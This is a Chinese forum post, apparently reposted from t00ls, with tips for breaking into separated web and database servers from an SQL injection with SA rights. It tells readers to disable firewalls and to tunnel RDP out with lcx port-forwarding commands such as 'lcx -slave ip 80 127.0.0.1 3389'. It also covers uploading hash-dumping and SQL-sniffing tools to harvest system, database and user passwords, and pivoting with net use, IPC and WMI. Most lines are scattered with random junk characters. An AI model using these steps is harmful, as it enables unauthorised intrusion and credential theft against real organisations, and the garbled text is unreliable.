当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。9 ~: y( _/ V/ r8 L8 w4 o
+ \$ O$ @1 n5 X9 H
' X ? ~( {' F+ H. |4 D& F4 |
4 H D" `1 W4 a% E( _SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)+ W: P Q4 Z& ^& j7 R, ~
4 @; n) ]+ m3 W+ N9 D n2 g+ u+ v+ ^: r8 C& g: W+ m
一、DB机有公网IP.
6 [$ C; M- h& K/ } U4 b. l, G. ?8 _7 X5 y
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.4 @& e& J9 d2 Q% m ^6 t% a
1 [3 g" R7 R% |; W7 W5 I# G5 }) @; l/ w p5 N& u& |, J. L
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
" k0 ]7 A- A- C: v, d3 L- d. u; a" {2 M5 [
0 q) R2 D& y, ?3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
4 K( h1 O& m1 I2 H! h5 q2 U! I8 ]- s3 e+ u# {
' Z& V0 D5 {4 d4 d9 U4 F7 P4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.$ R2 v3 x- v4 w" j- f# P
1 g& }9 n/ k; Z5 O: C9 J
; V- v9 Q& k; x- V9 _ Y
6 a* B( l) {( u |0 g( v! t7 }/ O, E8 }
二、DB机只有内网IP
( C% H, ]- ?, ~6 ~: I5 ?
' [" F% F9 C. \3 y( W3 ?1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
J) n- t; F8 G' g( h- K4 |% n* ? L- P1 b# S' `1 Q) i% h7 I
4 N& s5 o: ?4 K/ X6 H6 x! d: @/ \
2:停掉防火墙和IP策略再从内往外扫描.8 B5 v5 f+ R$ B6 y& A0 O
( M3 ?- I* J4 m0 ^- A
% A9 S* G- R* L0 ]5 d" U
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
( x# a# {" F g' Z" u# U8 Y1 x4 q$ `8 u8 K
: E% \8 }' H" j, a- h
4:学会密码规律分析往往会有惊喜.# p; _' ^' b% F8 b: e( I. o
1 H% x+ v; f N* u# q
7 s# @. _* d2 [1 C
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等% C! ^3 U" Q6 y c0 C& E
/ o0 s+ c# }" B: ?+ _5 A! `/ a. Z
2 B+ m! b( x$ `; L有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对